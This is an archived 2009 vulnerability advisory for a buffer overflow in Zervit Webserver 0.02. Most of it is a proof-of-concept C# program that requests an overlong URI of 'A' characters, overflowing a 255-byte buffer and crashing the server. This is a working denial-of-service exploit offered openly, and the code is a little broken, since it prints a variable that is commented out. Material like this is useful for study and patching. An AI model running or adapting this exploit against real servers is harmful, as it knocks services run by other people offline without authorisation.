Zervit Webserver Buffer Overflow

2009-04-17T00:00:00
ID SECURITYVULNS:DOC:21685
Type securityvulns
Reporter Securityvulns
Modified 2009-04-17T00:00:00

Description

# Zervit Webserver 0.02 Buffer Overflow
#### By: e.wiZz!
###Site: www.balcansecurity.com
## Found with ServMeNot (world's sexiest fuzzer :P )

In the wild...

Vend0r site: http://www.ohloh.net/projects/mereo

/ When requested uri isn't found,it goes to char tmp[255], and later it is used to output,you need 256 chars to overflow (check source "http.c") /

using System; using System.IO; using System.Net; using System.Text;

class whatsoever { static void Main() { // StringBuilder sb = new StringBuilder();

    //byte[] buf = new byte[8192];

    Console.WriteLine("Enter site: (http://localhost)");
    string sajt = Console.ReadLine();
    string uribad =

"/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; HttpWebRequest request = (HttpWebRequest)

        WebRequest.Create(sajt+uribad);

    HttpWebResponse response = (HttpWebResponse)
        request.GetResponse();
    // you shouldn't see response
    Console.WriteLine(sb.ToString());
}

}